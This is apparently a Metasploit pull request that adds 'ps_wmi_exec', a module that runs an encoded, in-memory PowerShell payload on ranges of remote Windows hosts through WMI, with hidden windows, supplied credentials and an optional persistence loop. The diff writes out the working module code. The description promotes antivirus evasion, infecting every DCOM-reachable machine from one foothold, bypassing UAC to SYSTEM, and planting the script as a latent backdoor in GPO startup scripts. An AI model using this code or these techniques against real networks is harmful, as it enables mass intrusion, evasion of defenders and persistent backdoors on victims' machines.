### PR TITLE
Powershell WMI execution post module

### DIFF
--- a/modules/exploits/windows/local/ps_wmi_exec.rb
+++ b/modules/exploits/windows/local/ps_wmi_exec.rb
@@ -120,14 +120,14 @@ class Metasploit3 < Msf::Exploit::Local
   def exploit
 
     # Make sure we meet the requirements before running the script
-    # Shell sessions can't kill PIDs
-    if !have_powershell?
-      print_error("Incompatible environment - PowerShell is required")
-      return
+    unless have_powershell?
+      fail_with(Failure::BadConfig, 'PowerShell not found')
     end
+
+
     # SYSTEM doesnt have credentials on remote hosts
     if is_system? and datastore['RHOSTS']
-      print_error("Cannot run as system")
+      print_error("Cannot run as local system on remote hosts")
       return 0
     end
 
@@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Local
       print_good script
       return
     end
-    #
+
     print_good("#{datastore["RHOSTS"] ? psh_exec(script) : psh_exec(script,true,false)}")
     vprint_good('PSH WMI exec is complete.')
   end

--- a/modules/exploits/windows/local/ps_wmi_exec.rb
+++ b/modules/exploits/windows/local/ps_wmi_exec.rb
@@ -1,13 +1,8 @@
 # -*- coding: binary -*-
-##
-# $Id$
-##
 
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 ##
@@ -29,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Local
 
   def initialize(info={})
     super(update_info(info,
-      'Name'                 => "Current User WMI Exec Powershell",
+      'Name'                 => "Authenticated WMI Exec via Powershell (Local Exploit)",
       'Description'          => %q{
         This module uses WMI execution to launch a payload instance on a remote machine.
         In order to avoid AV detection, all execution is performed in memory via psh-net
@@ -49,6 +44,7 @@ class Metasploit3 < Msf::Exploit::Local
       'SessionTypes'  => [ 'meterpreter' ],
       'Targets' => [ [ 'Universal', {} ] ],
       'DefaultTarget' => 0,
+      'DisclosureDate'=> "Aug 19 2012"
 
     ))
 
@@ -63,8 +59,8 @@ class Metasploit3 < Msf::Exploit::Local
 
     register_advanced_options(
       [
-        OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
-        OptBool.new('RUN_REMOTE_WOW64', [
+        OptBool.new('PowerShellPersist', [false, 'Run the payload in a loop']),
+        OptBool.new('RunRemoteWow64', [
           false,
           'Execute powershell in 32bit compatibility mode, payloads need native arch',
           false
@@ -86,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     # Create base64 encoded payload
     psh_payload_raw = Msf::Util::EXE.to_win32pe_psh_reflection(framework, payload.raw)
-    if datastore['PERSIST']
+    if datastore['PowerShellPersist']
       fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
       sleep_time = rand(5)+5
       psh_payload  = "function #{fun_name}{#{psh_payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name};1}"
@@ -97,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Local
     # Build WMI exec calls to every host into the script to reduce PS instances
     # Need to address arch compat issue here, check powershell.exe arch, check pay arch
     # split the hosts into wow64 and native, and run each range separately
-    ps_bin = datastore['RUN_REMOTE_WOW64'] ? 'cmd /c %windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
+    ps_bin = datastore['RunRemoteWow64'] ? 'cmd /c %windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
     # for whatever reason, passing %systemroot% instead of 'C:\windows' fails
 
     if datastore["RHOSTS"]
@@ -125,8 +121,8 @@ class Metasploit3 < Msf::Exploit::Local
 
     # Make sure we meet the requirements before running the script
     # Shell sessions can't kill PIDs
-    if !(session.type == "meterpreter" || have_powershell?)
-      print_error("Incompatible Environment")
+    if !have_powershell?
+      print_error("Incompatible environment - PowerShell is required")
       return
     end
     # SYSTEM doesnt have credentials on remote hosts
@@ -136,10 +132,14 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     script = build_script
-print_good script if datastore['PSH::dry_run']
+
+    if datastore['Powershell::Post::dry_run']
+      print_good script
+      return
+    end
     #
     print_good("#{datastore["RHOSTS"] ? psh_exec(script) : psh_exec(script,true,false)}")
-    print_good('Finished!')
+    vprint_good('PSH WMI exec is complete.')
   end
 
   # Wrapper function for instantiating a WMI win32_process
@@ -176,7 +176,6 @@ EOS
 }
 
 EOS
-
 
   return ps_wrapper
   end

--- a/modules/exploits/windows/local/ps_wmi_exec.rb
+++ b/modules/exploits/windows/local/ps_wmi_exec.rb
@@ -1,0 +1,184 @@
+# -*- coding: binary -*-
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+##
+# Ideally the methods to create WMI wrapper functions and their callers
+# should be in /lib/msf/core/post/windows/powershell/ps_wmi.rb.
+##
+
+require 'msf/core'
+require 'msf/core/exploit/powershell/dot_net'
+require 'msf/core/post/windows/powershell'
+require 'msf/core/post/windows/priv'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::Windows::Powershell
+  include Msf::Exploit::Powershell::DotNet
+  include Msf::Post::Windows::Priv
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'                 => "Current User WMI Exec Powershell",
+      'Description'          => %q{
+        This module uses WMI execution to launch a payload instance on a remote machine.
+        In order to avoid AV detection, all execution is performed in memory via psh-net
+        encoded payload. Persistence option can be set to keep the payload looping while
+        a handler is present to receive it. By default the module runs as the current
+        process owner. The module can be configured with credentials for the remote host
+        with which to launch the process.
+      },
+      'License'              => MSF_LICENSE,
+      'Author'               => 'RageLtMan <rageltman[at]sempervictus>',
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Payload' => { 'Space' => 8192 },
+      'Platform'      => [ 'windows' ],
+      'SessionTypes'  => [ 'meterpreter' ],
+      'Targets' => [ [ 'Universal', {} ] ],
+      'DefaultTarget' => 0,
+
+    ))
+
+    register_options(
+      [
+        OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
+        OptString.new('USERNAME', [false, "Username to authenticate as"]),
+        OptString.new('PASSWORD', [false, "Password to authenticate with"]),
+        OptString.new('DOMAIN', [false, "Domain or machine name"]),
+
+      ], self.class)
+
+    register_advanced_options(
+      [
+        OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
+        OptBool.new('RUN_REMOTE_WOW64', [
+          false,
+          'Execute powershell in 32bit compatibility mode, payloads need native arch',
+          false
+        ]),
+
+      ], self.class)
+
+  end
+
+  def build_script
+    run_opts = {}
+    run_opts[:username] = datastore['USERNAME']
+    run_opts[:domain] = datastore['DOMAIN'] || '.'
+    run_opts[:password] = datastore['PASSWORD']
+
+    # End of file marker
+    eof = Rex::Text.rand_text_alpha(8)
+    env_suffix = Rex::Text.rand_text_alpha(8)
+
+    # Create base64 encoded payload
+    psh_payload_raw = Msf::Util::EXE.to_win32pe_psh_reflection(framework, payload.raw)
+    if datastore['PERSIST']
+      fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
+      sleep_time = rand(5)+5
+      psh_payload  = "function #{fun_name}{#{psh_payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name};1}"
+    end
+    psh_payload = compress_script(psh_payload_raw, eof)
+    # WMI exec function - this is going into powershell.rb after pull 701 is commited
+    script = ps_wmi_exec(run_opts)
+    # Build WMI exec calls to every host into the script to reduce PS instances
+    # Need to address arch compat issue here, check powershell.exe arch, check pay arch
+    # split the hosts into wow64 and native, and run each range separately
+    ps_bin = datastore['RUN_REMOTE_WOW64'] ? 'cmd /c %windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
+    # for whatever reason, passing %systemroot% instead of 'C:\windows' fails
+
+    if datastore["RHOSTS"]
+      # Iterate through our hosts list adding a call to the WMI wrapper for each.
+      # This should learn to differentiate between hosts and call WOW64 as appropriate,
+      # as well as putting the payload into a variable when many hosts are hit so the
+      # uploaded script is not bloated since each encoded payload is bulky.
+
+      Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |host|
+        if run_opts[:username] and run_opts[:password]
+          script << " New-RemoteProcess -rhost \"#{host}\" -login \"#{run_opts[:domain]}\\#{run_opts[:username]}\""
+          script << " -pass '#{run_opts[:password]}' -cmd \"#{ps_bin} -EncodedCommand #{psh_payload}\";"
+        else
+          script << " New-RemoteProcess -rhost \"#{host}\" -cmd \"#{ps_bin} -EncodedCommand #{psh_payload}\";"
+        end
+      end
+    else
+      print_status('Running Locally')
+      script = psh_payload_raw
+    end
+    return script
+  end
+
+  def exploit
+
+    # Make sure we meet the requirements before running the script
+    # Shell sessions can't kill PIDs
+    if !(session.type == "meterpreter" || have_powershell?)
+      print_error("Incompatible Environment")
+      return
+    end
+    # SYSTEM doesnt have credentials on remote hosts
+    if is_system? and datastore['RHOSTS']
+      print_error("Cannot run as system")
+      return 0
+    end
+
+    script = build_script
+print_good script if datastore['PSH::dry_run']
+    #
+    print_good("#{datastore["RHOSTS"] ? psh_exec(script) : psh_exec(script,true,false)}")
+    print_good('Finished!')
+  end
+
+  # Wrapper function for instantiating a WMI win32_process
+  # class object in powershell.
+  # Insantiates the [wmiclass] object and configures the scope
+  # Sets impersonation level and injects credentials as needed
+  # Configures application startup options to hide the newly
+  # created window. Adds start-up check for remote proc.
+  def ps_wmi_exec(opts = {})
+
+    ps_wrapper = <<EOS
+Function New-RemoteProcess {
+    Param([string]$rhost,[string]$cmd,[string]$login,[string]$pass)
+    $ErrorActionPreference="SilentlyContinue"
+  $proc = [WMIClass]"\\\\$rhost\\root\\cimv2:Win32_Process"
+EOS
+  if opts[:username] and opts[:password]
+    ps_wrapper += <<EOS
+  $proc.psbase.Scope.Options.userName = $login
+  $proc.psbase.Scope.Options.Password = $pass
+EOS
+  end
+  ps_wrapper += <<EOS
+  $proc.psbase.Scope.Options.Impersonation = [System.Management.ImpersonationLevel]::Impersonate
+  $proc.psbase.Scope.Options.Authentication = [System.Management.AuthenticationLevel]::PacketPrivacy
+  $startup = [wmiclass]"Win32_ProcessStartup"
+  $startup.Properties['ShowWindow'].value=$False
+  $remote = $proc.Create($cmd,'C:\\',$startup)
+  if ($remote.returnvalue -eq 0) {
+    Write-Host "Successfully launched on $rhost with a process id of" $remote.processid
+  } else {
+    Write-Host "Failed to launch on $rhost. ReturnValue is" $remote.ReturnValue
+  }
+}
+
+EOS
+
+
+  return ps_wrapper
+  end
+
+end

--- a/modules/exploits/windows/local/ps_wmi_exec.rb
+++ b/modules/exploits/windows/local/ps_wmi_exec.rb
@@ -11,7 +11,6 @@
 ##
 
 require 'msf/core'
-require 'msf/core/exploit/powershell/dot_net'
 require 'msf/core/post/windows/powershell'
 require 'msf/core/post/windows/priv'
 


### PR DESCRIPTION
Powerhell provides direct interface to WMI, allowing users in UAC
or otherwise restricted context to attain privileged resources via
impersonation. Moreover, WMI allows for execution remotely, on any
endpoint attainable via DCOM. In practice, this allows foothold on
a single domain host to immediately infect every machine accessible
via DCOM either from the currently held privileged context (such as
a domain administrator) or from a new context generated by entering
acquired credentials.
Payloads, remote commands, and collection activities can be invoked
without direct IP connectivity on a remote host, and output can
be collected the same way.
Of particular note when implementing this technique is that admin
contexts resulting from this form of execution are not encapsulated
in UAC, allowing for immediate privesc to system if creating a new
session.
Old notes show that loopback exec is not stable or usable, though
this merits further research as it seems the native way to avoid
UAC altogether without any exploitation.
As with all the other powershell vectors, this mechanism provides
in-memory execution, and in all our testing walks right through the
AV currently out there since it has no service executable, on-disk
footprint, or even error log from the improper service exit that
psexec causes. Sandboxes dont cover powershell - too much runtime
entropy and some quite legitimate use of sockets and unmanaged
memory marshalling to get a good "guess" of what the code is trying
to do.
Makes for a great gift left behind in GPO startup scripts or other
latent backdoor approaches. Since a script is produced, those with
the need and craft can alter the resulting scripts to dynamically
enumerate domain hosts meeting their needs for exploitation at
runtime, as opposed to the "brute-force" approach used here.

---

Testing:
  The internal module has been in use for over three years in our
fork. Its been instrumental in showing several clients what it
means to be "pwned" in 30s flat. This particular version has been
slightly altered for upstream consumption and should be tested
again by community and developers alike in the upstream branch.

Note:
  Word to the wise on target selection - choose carefully, it is
possible to generate more sessions than an L3 pivoted handler can
comfortably address, and having a thousand reverse_tcp sessions
going past the edge is sure to raise an eyebrow at the SOC.
